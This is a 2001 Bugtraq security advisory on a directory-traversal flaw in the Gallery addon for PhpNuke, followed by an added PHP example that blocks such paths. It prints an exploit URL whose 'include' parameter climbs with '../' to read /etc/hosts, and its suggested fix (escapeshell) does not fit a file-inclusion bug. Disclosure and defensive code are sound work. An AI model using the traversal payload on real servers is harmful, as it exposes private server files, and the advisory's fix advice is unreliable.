Bugtraq mailing list archives
Gallery Addon for PhpNuke remote file viewing vulnerability
From: Cabezon Aurélien <aurelien.cabezon () isecurelabs com>
Date: Sun, 18 Nov 2001 03:18:26 +0100
Gallery Addon for PhpNuke remote file viewing vulnerability

Problem discovered: 18/10/2001 by Cabezon Aurélien | aurelien.cabezon () iSecureLabs com

[1] Description

Gallery is an intuitive web based photo gallery with authenticated users and privileged albums. Photo management includes automatic thumbnails, resizing, rotation, etc. Gallery is available as a Nuke 5.0 module.

Gallery Addon is vulnerable to the ../.. bug that allows remote file reading on the web server as whatever user runs the web server.

[2] Exploit

http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts

[3] Fix

The coder has been alerted. An easy way to fix such a vulnerability is to use the PHP included "system escapeshell" function.

[4] Information about Gallery Addon for PhpNuke

http://www.menalto.com/projects/gallery-nuke/
Author: bharat () menalto com

---
Cabezon Aurélien
http://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.
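One way to constrain an "include" request parameter like the one in the advisory, as an added example that is not Gallery's code and not from the original post: it canonicalises the requested path with realpath() and accepts it only if it stays inside one base directory. The function name, directory layout and sample files are hypothetical and constructed for the demonstration.

```php
<?php
// Added example (hypothetical names): map a user-supplied "include" value to
// a file that must live inside a single base directory, or reject it.
function resolve_module_include(string $baseDir, string $requested): ?string
{
    // Reject empty values, NUL bytes, absolute paths and scheme-style
    // prefixes (e.g. "php://", "C:") before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false
        || preg_match('#^([a-z][a-z0-9+.-]*:|[/\\\\])#i', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" sequences and follows symlinks; it returns
    // false when the target does not exist.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Containment check: the canonical path must begin with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed sample tree: one legitimate module file, one file outside it.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gallery_demo_' . getmypid();
$moduleDir = $root . '/modules/gallery';
mkdir($moduleDir, 0700, true);
file_put_contents($moduleDir . '/index.php', "<?php // album view\n");
file_put_contents($root . '/secret.txt', "outside the module directory\n");

// Constructed inputs; the third is the value shown in the advisory's URL.
$samples = ['index.php', '../../secret.txt', '../../../../../../etc/hosts',
            '/etc/hosts', "index.php\0.jpg"];
foreach ($samples as $value) {
    $path = resolve_module_include($moduleDir, $value);
    printf("%-40s => %s\n", json_encode($value),
           $path === null ? 'rejected' : 'allowed');
}

// Remove the constructed files again.
unlink($moduleDir . '/index.php');
unlink($root . '/secret.txt');
rmdir($moduleDir);
rmdir($root . '/modules');
rmdir($root);
```

Only the first sample resolves to a file under the module directory; the traversal, absolute-path and NUL-byte inputs are rejected before any file is opened.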
Current thread:
- Gallery Addon for PhpNuke remote file viewing vulnerability Cabezon Aurélien (Nov 19)